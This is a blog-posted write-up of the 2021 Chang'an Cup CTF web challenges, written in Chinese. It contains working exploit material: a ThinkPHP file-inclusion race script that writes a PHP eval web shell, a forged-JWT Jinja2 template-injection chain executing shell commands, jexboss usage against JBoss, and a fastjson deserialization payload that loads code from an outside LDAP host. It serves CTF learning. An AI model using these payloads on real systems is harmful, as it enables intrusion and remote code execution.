长安杯ctf2021web

DaLaBengBa

扫描目录得备份文件
查看控制器index
IndexController.class.php

<?php
namespace Home\Controller;
use Think\Controller;
class IndexController extends Controller {
    public function index($doge=''){
        if(preg_grep('/flag|Home|Common\/21/i',$doge)){
            die("<dialog open>Get Out Hacker!</dialog>");
        }else{
            $this->assign($doge);
            $this->display();
        }
    }
}

根据参考文章的分析可知
传入的数组变量$doge最后赋值给Storage::load方法中的数组$vars变量
extract()函数会对其造成变量覆盖

    public function load($_filename,$vars=null){
        if(!is_null($vars)){
            extract($vars, EXTR_OVERWRITE);
        }
        include $_filename; //进行包含文件的操作
    }

当我们传入的$dogearray(['_filename'=>'/etc/passwd'])
构造url可形成任意文件包含漏洞

http://498eeee3.yunyansec.com/index.php?g=index&m=home&a=index&doge[_filename]=/etc/passwd

最后利用条件竞争包含session临时文件getshell

#coding=utf-8
import io
import requests
import threading
sessid = 'TGAO'

data = {"cmd":'''file_put_contents('/var/www/html/1.php', 'shivers<?php eval($_POST["cmd"]);?>');'''}
def write(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        resp = session.post( 'http://498eeee3.yunyansec.com/index.php', data={'PHP_SESSION_UPLOAD_PROGRESS': 'aaa<?php eval($_POST["cmd"]);?>'}, files={'file': ('tgao.txt',f)}, cookies={'PHPSESSID': sessid} )

def read(session):
    while True:
        resp = session.post('http://498eeee3.yunyansec.com/index.php/?g=index&m=home&a=index&doge[_filename]=/tmp/sess_'+sessid,data=data)
        if'tgao.txt'in resp.text:
            print(resp.text)
            event.clear()
        else:
            print("[+++++++++++++]retry")
            
if __name__=="__main__":
    event=threading.Event()
    with requests.session() as session:
        for i in range(1,30): 
            threading.Thread(target=write,args=(session,)).start()
        for i in range(1,30):
            threading.Thread(target=read,args=(session,)).start()
    event.set()

连接1.php
密码cmd
POST提交cmd=print_r(file_get_contents('flag.php'));
flag在页面源代码中

参考https://www.cnblogs.com/zpchcbd/p/11949672.html

ezpy

利用c-jwt-cracker工具爆破jwt得密钥CTf4r
https://jwt.io/网站进行jwt伪造
可以发现在user处存在ssti模板注入

{
  "user": "admin{{7*7}}",
  "uid": "8606d40d-eac5-4b32-abcf-c6affeee56c1",
  "role": "admin",
  "passwd": "admin"
}

可以在网页的title中得到回显

把所有类下载到本地
{{[].__class__.__base__.__subclasses__()}}
写脚本找到catch_warnings类的序号为[243]

f = open('test.txt', 'r')
data = f.read()
r = data.split("<TemplateReference None>")
for i in range(len(r)):
    if 'catch_warnings' in r[i]:
        print(i, '~~~', r[i])
f.close()

经过绕过后进行构造

{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__.__builtins__[request.args.cat1](request.args.cat2)}}

最后利用

{
  "user": "admin{{[].__class__.__base__.__subclasses__()[243].__init__.__globals__.__builtins__[request.args.cat1](request.args.cat2)}}",
  "uid": "8606d40d-eac5-4b32-abcf-c6affeee56c1",
  "role": "admin",
  "passwd": "admin"
}
#####
GET /flag?cat1=eval&cat2=__import__('os').popen('cat$IFS$9/flag').read() HTTP/1.1
Host: edf0588e.yunyansec.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Origin: http://edf0588e.yunyansec.com/
Connection: close
Referer: http://edf0588e.yunyansec.com/
Cookie: Hm_lvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484716,1632484831; Hm_lpvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484831; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiYWRtaW57e1tdLl9fY2xhc3NfXy5fX2Jhc2VfXy5fX3N1YmNsYXNzZXNfXygpWzI0M10uX19pbml0X18uX19nbG9iYWxzX18uX19idWlsdGluc19fW3JlcXVlc3QuYXJncy5jYXQxXShyZXF1ZXN0LmFyZ3MuY2F0Mil9fSIsInVpZCI6Ijg2MDZkNDBkLWVhYzUtNGIzMi1hYmNmLWM2YWZmZWVlNTZjMSIsInJvbGUiOiJhZG1pbiIsInBhc3N3ZCI6ImFkbWluIn0.eHyTMcgRaEFgD7U64BCWlrd0UoG8hmwDvA2MMvH2BcM
Upgrade-Insecure-Requests: 1

Old But A Little New

jboss漏洞
利用jexboss工具

# 搭建
git clone https://github.com/joaomatosf/jexboss.git
pip install requires.txt

# 使用
python jexboss.py -u http://a15a0a60.yunyansec.com/

asuka

同上

soeasy

fastjson<=1.2.47-反序列化漏洞

# 工具:marshalsec,需要用mvn打包一下,建议直接使用打包好的。
# github:https://github.com/mbechler/marshalsec
# 链接(已打包好): https://pan.baidu.com/s/1kT9vwhNDDdiJ3dL9BS3U4w&shfl=shareset 提取码: sven

#####
POST / HTTP/1.1
Host: 8b70f48d.yunyansec.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484716,1632484831; Hm_lpvt_f6095793646f2ba4a15ac9ee2cd1af7a=1632484831
Upgrade-Insecure-Requests: 1
Content-Length: 253

{'name':{
      "@type": "java.lang.Class",
      "val": "com.sun.rowset.JdbcRowSetImpl"
    },
    "x": {
      "@type": "com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName": "ldap://xxx.xxx.xxx.xxx:35402/Exploit",
     "autoCommit": true
   }}

可参考https://cloud.tencent.com/developer/article/1553664

posted @ 2021-09-25 18:33  Shivers0x72  阅读(701)  评论(0编辑  收藏  举报